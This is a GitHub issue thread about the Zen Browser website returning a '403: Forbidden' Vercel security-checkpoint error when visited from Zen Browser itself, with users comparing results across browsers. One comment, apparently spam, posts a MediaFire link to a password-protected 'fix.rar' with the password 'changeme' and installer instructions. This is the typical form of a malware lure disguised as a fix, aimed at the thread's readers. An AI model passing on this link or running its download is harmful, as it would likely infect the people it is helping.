### ISSUE TITLE
403: Forbidden Error Message

### ISSUE THREAD

**Issue by bengalbroy** [zen-browser/www#113]
When trying to access the Zen Browser website from within Zen Browser, it fails the Vercel Security Checkpoint and shows an error "403: Forbidden" I tried changing my dns and disabling all extensions just incase it was a problem on my end, but it still errors out. It works in safari, it's just from within zen browser itself that it fails.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by vunhatchuong** [comment]
I think they want to decrease traffic to the site since they have problems with payment before. But this also makes the theme store unavailable.

**Comment by NOCanoa** [comment]
Its up again whit a browser challenge for now : /

**Comment by g-ioannou** [comment]
This is still an issue for me. Can access the store with Chromium. Using zen as a flatpak

**Comment by bengalbroy** [comment]
This is still an issue for me

**Comment by Spitfire1900** [comment]
Same. Also, I cannot reproduce accessing https://www.zen-browser.app/themes in Firefox, only Zen.
